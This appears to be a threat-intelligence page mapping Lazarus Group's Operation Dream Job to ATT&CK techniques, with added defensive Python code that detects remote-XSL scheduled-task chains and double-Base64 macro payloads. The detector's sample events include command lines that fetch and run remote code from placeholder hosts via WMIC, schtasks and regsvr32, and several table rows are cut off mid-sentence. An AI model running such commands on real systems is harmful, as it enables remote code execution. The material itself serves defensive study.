Operation Dream Job was a cyber espionage operation likely conducted by Lazarus Group that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between Operation Dream Job, Operation North Star, and Operation Interception; by 2022 security researchers described Operation Dream Job as an umbrella term covering both Operation Interception and Operation North Star.[1][2][3][4]
Domain | ID | Name | Use
---|---|---|---
Enterprise | T1087.002 | Account Discovery: Domain Account | During Operation Dream Job, Lazarus Group queried a compromised victim's Active Directory servers to obtain the list of employees, including administrator accounts.[3]
Enterprise | T1583.001 | Acquire Infrastructure: Domains | During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.[3]
Enterprise | T1583.004 | Acquire Infrastructure: Server | During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.[3]
Enterprise | T1583.006 | Acquire Infrastructure: Web Services | During Operation Dream Job, Lazarus Group used file hosting services like Dropbox and OneDrive.[1]
Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | During Operation Dream Job, Lazarus Group used HTTP and HTTPS to contact actor-controlled C2 servers.[2]
Enterprise | T1560.001 | Archive Collected Data: Archive via Utility | During Operation Dream Job, Lazarus Group archived victims' data into a RAR file.[3]
Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.[2]
Enterprise | T1110 | Brute Force | During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts.[3]
Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.[3]
Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.[3][2]
Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | During Operation Dream Job, Lazarus Group executed a VBA-written malicious macro after victims downloaded malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64-encoded DLL implant.[1][2]
Enterprise | T1584.001 | Compromise Infrastructure: Domains | For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.[2][5]
Enterprise | T1584.004 | Compromise Infrastructure: Server | For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.[1][3][2]
Enterprise | T1005 | Data from Local System | During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.[1][2]
Enterprise | T1622 | Debugger Evasion | During Operation Dream Job, Lazarus Group used tools that used the
Enterprise | T1587.001 | Develop Capabilities: Malware | For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.[1][3][2][5]
Enterprise | T1587.002 | Develop Capabilities: Code Signing Certificates | During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.[3]
Enterprise | T1573.001 | Encrypted Channel: Symmetric Cryptography | During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.[2]
Enterprise | T1585.001 | Establish Accounts: Social Media Accounts | For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.[1][3]
Enterprise | T1585.002 | Establish Accounts: Email Accounts | During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.[3]
Enterprise | T1041 | Exfiltration Over C2 Channel | During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.[1]
Enterprise | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | During Operation Dream Job, Lazarus Group used a custom build of the open-source command-line tool dbxcli to exfiltrate stolen data to Dropbox.[3][1]
Enterprise | T1083 | File and Directory Discovery | During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host, looking for security and financial matters.[1]
Enterprise | T1589 | Gather Victim Identity Information | For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets.[1]
Enterprise | T1591 | Gather Victim Org Information | For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.[1]
Enterprise | T1591.004 | Gather Victim Org Information: Identify Roles | During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.[1][3]
Enterprise | T1656 | Impersonation | During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.[1][3][4]
Enterprise | T1070.004 | Indicator Removal: File Deletion | During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.[3]
Enterprise | T1105 | Ingress Tool Transfer | During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.[1][3][2]
Enterprise | T1534 | Internal Spearphishing | During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.[1]
Enterprise | T1036.008 | Masquerading: Masquerade File Type | During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.[2][3]
Enterprise | T1106 | Native API | During Operation Dream Job, Lazarus Group used Windows API
Enterprise | T1027.002 | Obfuscated Files or Information: Software Packing | During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.[1][2][5]
Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and encoded DLL files with Base64.[1][3][2][5]
Enterprise | T1588.002 | Obtain Capabilities: Tool | For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.[1][3]
Enterprise | T1588.003 | Obtain Capabilities: Code Signing Certificates | During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.[3]
Enterprise | T1566.001 | Phishing: Spearphishing Attachment | During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.[1][2]
Enterprise | T1566.002 | Phishing: Spearphishing Link | During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.[1][3]
Enterprise | T1566.003 | Phishing: Spearphishing via Service | During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.[1][3]
Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.[3]
Enterprise | T1593.001 | Search Open Websites/Domains: Social Media | For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.[3]
Enterprise | T1505.004 | Server Software Component: IIS Components | During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems (IIS) to install C2 components.[2]
Enterprise | T1608.001 | Stage Capabilities: Upload Malware | For Operation Dream Job, Lazarus Group used compromised servers to host malware.[1][3][2][5]
Enterprise | T1608.002 | Stage Capabilities: Upload Tool | For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.[3]
Enterprise | T1553.002 | Subvert Trust Controls: Code Signing | During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.[3]
Enterprise | T1218.010 | System Binary Proxy Execution: Regsvr32 | During Operation Dream Job, Lazarus Group used
Enterprise | T1218.011 | System Binary Proxy Execution: Rundll32 | During Operation Dream Job, Lazarus Group executed malware with
Enterprise | T1614.001 | System Location Discovery: System Language Discovery | During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.[1]
Enterprise | T1221 | Template Injection | During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template (DOTM) file.[1][2]
Enterprise | T1204.001 | User Execution: Malicious Link | During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.[1][3]
Enterprise | T1204.002 | User Execution: Malicious File | During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors.[1][2]
Enterprise | T1497.001 | Virtualization/Sandbox Evasion: System Checks | During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.[1]
Enterprise | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion | During Operation Dream Job, Lazarus Group used tools that collected
Enterprise | T1047 | Windows Management Instrumentation | During Operation Dream Job, Lazarus Group used WMIC to execute a remote XSL script.[3]
Enterprise | T1220 | XSL Script Processing | During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.[3]
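The T1047, T1053.005 and T1220 rows above describe one execution chain: a scheduled task that periodically runs WMIC with a remote XSL stylesheet, which in turn fetches a Base64-encoded DLL. The detection logic below is an added example written for this page, not code from MITRE or from the cited reports. It runs over constructed process-creation events (image path plus command line, the fields a Sysmon Event ID 1 or Windows 4688 record would carry) and flags WMIC `/format` arguments that point at a URL, `schtasks /create` commands whose task action contains such a WMIC invocation, and, as a generic heuristic I assume rather than something the page states, Regsvr32 or Rundll32 invoked with a URL argument. The `example.invalid` hostnames are placeholders.

```python
"""Detect the scheduled-task / WMIC / remote-XSL chain from the table above.

Added example for this page. Events below are constructed stand-ins for
process-creation telemetry, not data from the cited reports.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# WMIC's /format switch accepts a stylesheet path; a URL there means the
# stylesheet (and any script it embeds) is fetched from a remote host.
XSL_FORMAT_RE = re.compile(r"/format\s*[:=]\s*[\"']?(https?://[^\s\"']+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class Finding:
    technique: str      # ATT&CK technique ID the observation maps to
    reason: str         # human-readable explanation for the analyst
    command_line: str   # the offending command line, for triage


def analyze_command_line(image: str, cmdline: str) -> List[Finding]:
    """Return the findings for a single process-creation event."""
    findings: List[Finding] = []
    exe = image.lower().rsplit("\\", 1)[-1]
    low_cmd = cmdline.lower()

    # T1047 / T1220: wmic.exe told to render output through a remote XSL file.
    if exe == "wmic.exe":
        m = XSL_FORMAT_RE.search(cmdline)
        if m:
            findings.append(Finding("T1220", f"wmic /format loads remote stylesheet {m.group(1)}", cmdline))

    # T1053.005: the task being created runs wmic with a remote /format,
    # i.e. the persistence mechanism for the chain above.
    if exe == "schtasks.exe" and "/create" in low_cmd and "wmic" in low_cmd:
        if XSL_FORMAT_RE.search(cmdline):
            findings.append(Finding("T1053.005", "scheduled task action runs wmic with a remote /format", cmdline))

    # T1218.010 / .011: assumed generic heuristic (not from the page):
    # a signed proxy-execution binary given a URL on its command line.
    if exe in ("regsvr32.exe", "rundll32.exe") and URL_RE.search(cmdline):
        findings.append(Finding("T1218", f"{exe} invoked with a URL argument", cmdline))

    return findings


def scan_events(events: List[Tuple[str, str]]) -> List[Finding]:
    """Run the checks over (image, command_line) pairs and collect findings."""
    out: List[Finding] = []
    for image, cmdline in events:
        out.extend(analyze_command_line(image, cmdline))
    return out


# Constructed sample events: three that match the chain, two benign.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\System32\wbem\WMIC.exe", 'wmic os get /format:"http://example.invalid/ui.xsl"'),
    (r"C:\Windows\System32\schtasks.exe",
     'schtasks /create /sc minute /mo 10 /tn "Office Update" /tr "wmic os get /format:http://example.invalid/ui.xsl"'),
    (r"C:\Windows\System32\regsvr32.exe", "regsvr32 /s /u /i:http://example.invalid/a.sct scrobj.dll"),
    (r"C:\Windows\System32\wbem\WMIC.exe", "wmic computersystem get name"),
    (r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.technique}] {f.reason}\n    {f.command_line}")
```

The WMIC and schtasks checks are the ones grounded in the table; a hunt would pair them with the T1547.001 observation (LNK files in the Startup folder) and look for the child `wmic.exe` spawned by the Task Scheduler service.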
ID | Name | Description
---|---|---
S0694 | DRATzarus | During Operation Dream Job, Lazarus Group used DRATzarus to deploy open-source and partly commodity software such as Responder, Wake-On-Lan, and ChromePass onto infected hosts.[1]
S0174 | Responder | 
S0678 | Torisma | During Operation Dream Job, Lazarus Group used Torisma to actively monitor for new drives and remote desktop connections on an infected system.[2][5]
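The T1059.005 and T1027.013 rows of the techniques table note that the macro extracted a double Base64-encoded DLL implant. A document scanner can catch that pattern without signatures by decoding long Base64 runs in macro string literals layer by layer and checking whether the result looks like a PE file. The code below is an added example written for this page, not code from MITRE or from the cited reports; the macro text and the "DLL" (an `MZ` header plus the DOS stub string, not a real executable) are constructed inline.

```python
"""Flag double-Base64-encoded PE payloads hidden in VBA string literals.

Added example for this page; the sample macro and payload are constructed.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# A Base64 run long enough to be worth decoding (short literals are noise).
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# VBA line continuation between two literals: "abc" & _ <newline> "def"
VBA_CONTINUATION_RE = re.compile(r'"\s*&\s*_\s*\r?\n\s*"')
DOS_STUB = b"This program cannot be run in DOS mode"
MAX_LAYERS = 3


def try_b64(data: bytes) -> Optional[bytes]:
    """Strict decode; returns None if data is not a valid Base64 string."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_pe(blob: bytes) -> bool:
    """Cheap PE check: MZ magic plus the DOS stub message."""
    return blob[:2] == b"MZ" and DOS_STUB in blob


def find_encoded_pe(macro_source: str) -> List[Dict[str, int]]:
    """Return one record per embedded PE found, with the number of Base64
    layers that had to be peeled and the decoded payload size."""
    # Join literals split across continuation lines so the run is contiguous.
    joined = VBA_CONTINUATION_RE.sub("", macro_source)
    hits: List[Dict[str, int]] = []
    for literal in re.findall(r'"([^"]*)"', joined):
        for run in B64_RUN_RE.findall(literal):
            blob = run.encode()
            layers = 0
            while layers < MAX_LAYERS:
                decoded = try_b64(blob)
                if decoded is None:
                    break          # not Base64 any more: stop peeling
                layers += 1
                if looks_like_pe(decoded):
                    hits.append({"layers": layers, "size": len(decoded)})
                    break
                blob = decoded     # maybe another layer underneath
    return hits


# Constructed stand-in for a DLL: MZ magic, padding, DOS stub text.
FAKE_DLL = b"MZ\x90\x00" + b"\x00" * 60 + DOS_STUB + b"\x00" * 16
_inner = base64.b64encode(FAKE_DLL).decode()             # first layer
_outer = base64.b64encode(_inner.encode()).decode()      # second layer
_chunks = [_outer[i:i + 60] for i in range(0, len(_outer), 60)]
SAMPLE_MACRO = (
    "Sub AutoOpen()\n"
    "    Dim payload As String\n"
    '    payload = "' + '" & _\n        "'.join(_chunks) + '"\n'
    "End Sub\n"
)

if __name__ == "__main__":
    for hit in find_encoded_pe(SAMPLE_MACRO):
        print(f"embedded PE: {hit['layers']} Base64 layer(s), {hit['size']} bytes")
```

The strict decoder matters: ordinary text that merely uses the Base64 alphabet fails validation at the next layer, so the loop stops without false positives, and the layer cap keeps a crafted input from making the scanner decode forever.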